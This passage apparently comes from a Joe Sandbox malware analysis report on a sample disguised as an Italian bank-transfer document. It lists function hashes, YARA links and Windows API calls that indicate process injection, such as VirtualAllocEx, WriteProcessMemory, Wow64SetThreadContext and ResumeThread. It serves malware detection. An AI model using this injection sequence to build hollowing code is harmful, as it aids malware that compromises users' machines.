                                  • Opcode Fuzzy Hash: 46ee2044f99cedfca2c8103fa8f41fe6deb02e91ec741c782269aa57a81330f4
                                  • Instruction Fuzzy Hash: 4F41E271C00719CBDB24CFAAC9487CEBBB5BF49304F20806AD518AB255DB75A94ACF90
                                  Function 073B4D88 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073B4E20
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 49ae945a9385ac152a5571d2db35b514f3f2a4ac91752bce38d6fbd9cfe1cae3
                                  • Instruction ID: 1c7cef3f77e08830c1b317b4773fdc419821b0ec962157e95d27e5aca918fdb5
                                  • Opcode Fuzzy Hash: 49ae945a9385ac152a5571d2db35b514f3f2a4ac91752bce38d6fbd9cfe1cae3
                                  • Instruction Fuzzy Hash: 2E2126B59002599FDB20CFA9C885BEEBBF1FF48310F10842AE959A7241D7789945CB64
                                  Function 073B4D90 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073B4E20
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: adeca4f8ef23cde63f96c612d2b8003b2fc82d594371b591f34326d495dc7905
                                  • Instruction ID: b8902563410dd792d1b5e04f94f2c2f01aa2c564f3aa217c2a1ac80d0ccbbb7f
                                  • Opcode Fuzzy Hash: adeca4f8ef23cde63f96c612d2b8003b2fc82d594371b591f34326d495dc7905
                                  • Instruction Fuzzy Hash: 4F215AB1D003499FDB20CFAAC8847DEBBF5FF48310F108429E919A7241C7789940CBA4
                                  Function 073B4BF0 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073B4C76
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 757879efc9bba2e85ab3e60b4fc937253de82d83894ef17594e142b122aa1bc9
                                  • Instruction ID: b5ab96863a823e88d56ffd18aa395f9cd09e7eed30992645b476ef6a8ecddf7e
                                  • Opcode Fuzzy Hash: 757879efc9bba2e85ab3e60b4fc937253de82d83894ef17594e142b122aa1bc9
                                  • Instruction Fuzzy Hash: 382145B1D002099FDB20CFAAC4857EEBBF4EF48314F14842AD559A7241CB78A985CBA4
                                  Function 00C9E298 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                  Download Yara Rule
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C9E98E,?,?,?,?,?), ref: 00C9EA4F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359981875.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c90000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 13fc1802dfe1e544991e3ce69d49ad56391ac6d184229d2e866b44c343f254a8
                                  • Instruction ID: c8da0ad001bfb7f8c19eba6e7ae8fca3cb7965bf974aad6ea21ddd93e9c1f0fb
                                  • Opcode Fuzzy Hash: 13fc1802dfe1e544991e3ce69d49ad56391ac6d184229d2e866b44c343f254a8
                                  • Instruction Fuzzy Hash: 7121E5B5900248AFDB50CFAAD588ADEBFF5FB58310F14841AE918A3350D774A944DFA0
                                  Function 073B4E79 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073B4F00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 7e6ab439769e6fbb8f44cb2c25fa9d3052f048265b026e5d05cc20a4ed61916d
                                  • Instruction ID: c3e8ec5a8f85a8b3e08bfc386df2e57e042b7d5ea2026e2b104385d23dd9e907
                                  • Opcode Fuzzy Hash: 7e6ab439769e6fbb8f44cb2c25fa9d3052f048265b026e5d05cc20a4ed61916d
                                  • Instruction Fuzzy Hash: A52136B1D002499FDB20DFAAC984AEEBBF1FF48310F10842EE519A7240C7389945CBA0
                                  Function 073B4E80 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 073B4F00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: df0b9aa60767035a76b0c3fe81e8c306053cf862f45a6cc4be6f41136b5a678b
                                  • Instruction ID: be82142c90b017f00ad0cc18564c77fa894d2b8979482def6e54022aa9361052
                                  • Opcode Fuzzy Hash: df0b9aa60767035a76b0c3fe81e8c306053cf862f45a6cc4be6f41136b5a678b
                                  • Instruction Fuzzy Hash: 2C2128B1D003499FDB10CFAAC885AEEBBF5FF48310F50842AE559A7240C778A941CBA4
                                  Function 073B4BF8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 073B4C76
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 73db7428d847284258f2fae4538d5e27786da887e92803cd8df464f65d53a1da
                                  • Instruction ID: 69594b1813b0bc26b547a2e36752987a9b01d6936a796ba8597c950fdfdf952b
                                  • Opcode Fuzzy Hash: 73db7428d847284258f2fae4538d5e27786da887e92803cd8df464f65d53a1da
                                  • Instruction Fuzzy Hash: AE2135B1D003099FDB20DFAAC5857EEBBF4EF48310F50842AD559A7241CB78A945CFA4
                                  Function 073B4CC8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073B4D3E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 59453b9bf193e00e396cb2b22486f75269480bc480c64c67303a5e4e19df2a52
                                  • Instruction ID: 52fc17b8a0b6ca5231c3aa66d2823f1e2654286cfeaef93d9d2d5487e1c697de
                                  • Opcode Fuzzy Hash: 59453b9bf193e00e396cb2b22486f75269480bc480c64c67303a5e4e19df2a52
                                  • Instruction Fuzzy Hash: AA1147729002499FDB20CFAAD845BEEBFF5EF48310F248819E515A7250CB75A940CBA0
                                  Function 00C9BF18 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C9C7C1,00000800,00000000,00000000), ref: 00C9C9D2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359981875.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c90000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 8572db938ffa7c41ac1450d5f1aedee54db9269497fda3804802945182d0b8fa
                                  • Instruction ID: 12c2915b24bdc357eb00f263f60d1d3e5614921a3ff3ea2201f7441182d80e91
                                  • Opcode Fuzzy Hash: 8572db938ffa7c41ac1450d5f1aedee54db9269497fda3804802945182d0b8fa
                                  • Instruction Fuzzy Hash: CB1114B69003489FDB10CFAAD488A9EFBF4EB48310F11842EE569B7300C375A945CFA4
                                  Function 073B4CD0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073B4D3E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f9352e3e9e3f95194e7a1ca53b5673e9fed91d4254d912844bc5edd5324b75a0
                                  • Instruction ID: 14ca2adcb991c9edadb1c80cace56d952b8b4df2de865e0801c5b3e6223964d6
                                  • Opcode Fuzzy Hash: f9352e3e9e3f95194e7a1ca53b5673e9fed91d4254d912844bc5edd5324b75a0
                                  • Instruction Fuzzy Hash: 13113A729002499FDB20DFAAD8457DFBFF5EF48310F108819E515A7250CB759944CFA0
                                  Function 073B4B41 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: e25af016db64a72d5a1ba4ea024672f556ab4721c45c97dfb873955aa1f60ed4
                                  • Instruction ID: a34b488d094f0e27c004bc7ad4239124ed8aa85231a64ac7c3179dc55b7b4552
                                  • Opcode Fuzzy Hash: e25af016db64a72d5a1ba4ea024672f556ab4721c45c97dfb873955aa1f60ed4
                                  • Instruction Fuzzy Hash: 201146B1D002498BDB20DFAAC4847AEFFF4EB88310F248829D559A7240CB75A941CBA4
                                  Function 073B4B48 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 583f6b83074e1fe5d6a733ef74059a4dc72edfb351a65f6fccc7b3c365120011
                                  • Instruction ID: 4831d8c6f206e2958e00e20fd4e216a5be778b9acaeaf88d790f7584350f4aa4
                                  • Opcode Fuzzy Hash: 583f6b83074e1fe5d6a733ef74059a4dc72edfb351a65f6fccc7b3c365120011
                                  • Instruction Fuzzy Hash: F31128B1D002498BDB20DFAAC4457EEFFF5EB88310F208429D559A7240CB75A945CBA4
                                  Function 073B7DB1 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 073B7E15
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 2cb1ebfdf688aed8e536d9778781657bdb3f56808a3066e01ddcd1093969df58
                                  • Instruction ID: 0c320ffc72cf6dfe365f95a504178740e8fe572806c147935544ede3b1f264ec
                                  • Opcode Fuzzy Hash: 2cb1ebfdf688aed8e536d9778781657bdb3f56808a3066e01ddcd1093969df58
                                  • Instruction Fuzzy Hash: 791110B58003499FDB60DF9AD885BDEBBF8EB48320F10881AE558A3600D375A944CFA5
                                  Function 00C9C6E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00C9C746
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359981875.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c90000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 48b31269e8150870ccfd4c11ebd54487dd7471b9a2790a049b8c376a3d6d2d81
                                  • Instruction ID: 4912178447a20c8ef933c62da2a6b10ffdb5a4cb7020ef8783646a4dfb4c5ab0
                                  • Opcode Fuzzy Hash: 48b31269e8150870ccfd4c11ebd54487dd7471b9a2790a049b8c376a3d6d2d81
                                  • Instruction Fuzzy Hash: C511E3B6D006498FCB10CF9AD444ADEFBF5EB48310F10841AD469B7610D375A545CFA1
                                  Function 073B7600 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 073B7E15
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: cefce139b77796a419db66345edf2b5f6b84f98c8047f74c495a08147d975fe5
                                  • Instruction ID: 84e6f71c35a0d17b7da4244371c63a73df0bd9a04d5b1ab251bc27ea044c9f5d
                                  • Opcode Fuzzy Hash: cefce139b77796a419db66345edf2b5f6b84f98c8047f74c495a08147d975fe5
                                  • Instruction Fuzzy Hash: EB11F2B59002499FDB60DF9AD449BDEBBF8EB48310F10885AE958B7700D375A944CFA1
                                  Function 06C08A70 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep
                                  • API String ID: 0-914316021
                                  • Opcode ID: 16081054ab3c2ae1da01829952b326e1d86ac1380929ebe202cb3954d096079e
                                  • Instruction ID: efba766ddb61fb5a248d6efcbacc565809daaebcb078f133691b3c52154d9174
                                  • Opcode Fuzzy Hash: 16081054ab3c2ae1da01829952b326e1d86ac1380929ebe202cb3954d096079e
                                  • Instruction Fuzzy Hash: CA51AB71B012468FDB10EB7998589BEBBF6EFC4720B148969E429DB391EB30DD058790
                                  Function 06C06957 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: V
                                  • API String ID: 0-1342839628
                                  • Opcode ID: 414b504f220aea896f4f8e2273bc8c45d091ed1e0b9ed9eacb73575fa291c1cc
                                  • Instruction ID: 741169f3404c1c6a8839674760fdf5d5c83c868780ef1cab241d262222632f70
                                  • Opcode Fuzzy Hash: 414b504f220aea896f4f8e2273bc8c45d091ed1e0b9ed9eacb73575fa291c1cc
                                  • Instruction Fuzzy Hash: FD519E70D05215DFFB949F6BC5607BDBAB2AF04301F04806AF466AB6C2C735CAA4DB91
                                  Function 06C08DD0 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep
                                  • API String ID: 0-914316021
                                  • Opcode ID: 7cf4511e3a73af7880d76fbdada65cc935a13265ffc74163ff6fe29874f40c79
                                  • Instruction ID: 767d2d731bfe9ded477d1e756c6b39aba7395ae2da8414dcbcf120359e7aa75f
                                  • Opcode Fuzzy Hash: 7cf4511e3a73af7880d76fbdada65cc935a13265ffc74163ff6fe29874f40c79
                                  • Instruction Fuzzy Hash: B1418E75A013098FDB50DFA9C844AEEBBF5EB88310F14846AD915A7381E7719A01CBA1
                                  Function 06C07D60 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRp
                                  • API String ID: 0-3405495957
                                  • Opcode ID: bae5ba62006c299c3b6c6ac97c90f9050cb2b699390310f091142c53007367e7
                                  • Instruction ID: 83eb3f7bd206d0b823be58c99614687b35bf9497a48888d0bd9141537925ce15
                                  • Opcode Fuzzy Hash: bae5ba62006c299c3b6c6ac97c90f9050cb2b699390310f091142c53007367e7
                                  • Instruction Fuzzy Hash: 29412270E06340DFEB588F69C854AFABBB1AB45301F0880AAE5159B2C2D774A940CBB1
                                  Function 06C05688 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep
                                  • API String ID: 0-914316021
                                  • Opcode ID: 96d7d77cbfdd397c73019fdf2fa5ddf64fef3a198a43841f7820335ccb567be0
                                  • Instruction ID: ab7062ae5b729a029e25530b1db985fb1eb0bf0cb4513972b9be3657f6f1baee
                                  • Opcode Fuzzy Hash: 96d7d77cbfdd397c73019fdf2fa5ddf64fef3a198a43841f7820335ccb567be0
                                  • Instruction Fuzzy Hash: 4F119D74D05248AFCB51DFB8C949A9EBFB4AF05310F1041EEE854EB392E6305A81DFA1
                                  Function 06C08E80 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep
                                  • API String ID: 0-914316021
                                  • Opcode ID: e122ef7060cc67a729da8e727e2b89160799a1c02d80d134a73f24588e3da9be
                                  • Instruction ID: 4f1dbb22a96fd5bb46a4fd330227dc362c508dd2cf12dcceb3bee61dcbfc4490
                                  • Opcode Fuzzy Hash: e122ef7060cc67a729da8e727e2b89160799a1c02d80d134a73f24588e3da9be
                                  • Instruction Fuzzy Hash: C4114F31F122098BDF94EBB998106FFB6B6AF94350B504069C504E7384EB318E01CBA1
                                  Function 06C00900 Relevance: .5, Instructions: 500COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dc20814f01f2cb0d8a0d8dd6e49478d674163c21f5d4e7eeab67f9dbcb866059
                                  • Instruction ID: 9362024f40bc9191346d8db949f3d28a1e0c8c69f39ee10a3f71ed9be579c891
                                  • Opcode Fuzzy Hash: dc20814f01f2cb0d8a0d8dd6e49478d674163c21f5d4e7eeab67f9dbcb866059
                                  • Instruction Fuzzy Hash: B0221930A10205CFDB54DF68C884BADB7B2FF89304F1585A9E50AAB3A5DB71E945CB60
                                  Function 06C0F2A2 Relevance: .3, Instructions: 274COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b157511c8e46870821cbec57f55625dfaf3282b70cfba998ee9d9192c3cd78d8
                                  • Instruction ID: f27c177687bf53fbee397325e71dcb9f52074f9fbc338adc7ac146a0303fd0e8
                                  • Opcode Fuzzy Hash: b157511c8e46870821cbec57f55625dfaf3282b70cfba998ee9d9192c3cd78d8
                                  • Instruction Fuzzy Hash: 88C1F878D05218CFEB64CF55C984AEDBBB6FF49300F11919AD91AAB391D730AA81CF50
                                  Function 06C008D0 Relevance: .2, Instructions: 178COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c014be9ad16dd51de4bf27e44ed700f7c2d17cf51895f3ceef737c7163ad2bd
                                  • Instruction ID: 4b9fc0a6565db6a951c8da00cbf6ef529c965353d527423a159f2c288f219bf3
                                  • Opcode Fuzzy Hash: 7c014be9ad16dd51de4bf27e44ed700f7c2d17cf51895f3ceef737c7163ad2bd
                                  • Instruction Fuzzy Hash: F5616A307102008FEB14EF38C894BAD77A2EF8A314F1546BDD5569B3A5DB71E948CB61
                                  Function 06C06638 Relevance: .2, Instructions: 172COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1baf1570394124c55aa5985bab515255e4a9218af97a3e90d283d43c6947e295
                                  • Instruction ID: b298aa7f6bb044ec010427c775dc564be9f8db5fb772269e0e97245f58e99e96
                                  • Opcode Fuzzy Hash: 1baf1570394124c55aa5985bab515255e4a9218af97a3e90d283d43c6947e295
                                  • Instruction Fuzzy Hash: A7615E31A05215CFEB54CF6AC588A69FBB2FF45311F1586AAD0529B2E6C334ED60CF90
                                  Function 06C06648 Relevance: .2, Instructions: 170COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d65cce84ce25d52a81c689a70f2b14f231f342c69a88bf596907c3173168345d
                                  • Instruction ID: 3d13a7d0f097e953666de1577ce65f94a16c686082c1729c83400e0cd72d05a2
                                  • Opcode Fuzzy Hash: d65cce84ce25d52a81c689a70f2b14f231f342c69a88bf596907c3173168345d
                                  • Instruction Fuzzy Hash: D7615F31A05215CFEB44CF6AC588A69FBB2FF45311F1586AAD0529B2E6C334ED60CF90
                                  Function 06C033B0 Relevance: .2, Instructions: 167COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04bad05bc955fd198d27958c4133ee21aa30cfad0273a6455d39ffacbda03426
                                  • Instruction ID: 2872fe6d30c2d26e1c06e49431ad44068d68784adbcae5a44cf6dba4d1c61861
                                  • Opcode Fuzzy Hash: 04bad05bc955fd198d27958c4133ee21aa30cfad0273a6455d39ffacbda03426
                                  • Instruction Fuzzy Hash: BC519A307002459FEB55EB69C494BAEBBE6EF89704F14406DE10ADB3A1CB75ED01CB50
                                  Function 06C02638 Relevance: .1, Instructions: 141COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: acc83622aa6e00edc692c86b488d6ea036ccee81057232641dfb34fbb08be829
                                  • Instruction ID: 68785546d5e2f564638a3758551b3f0d5f23c18746e41e76de1f661f683d8380
                                  • Opcode Fuzzy Hash: acc83622aa6e00edc692c86b488d6ea036ccee81057232641dfb34fbb08be829
                                  • Instruction Fuzzy Hash: 1A41C775B001049FDB05DF64D854AAD7BF6EF89300F1580AAE905DB3A2DB35EE05CB90
                                  Function 06C033A0 Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6003336bfc0ed35e6cc4f83b2e0ae1315977f75248b53ee0a950a3b2c15a3c23
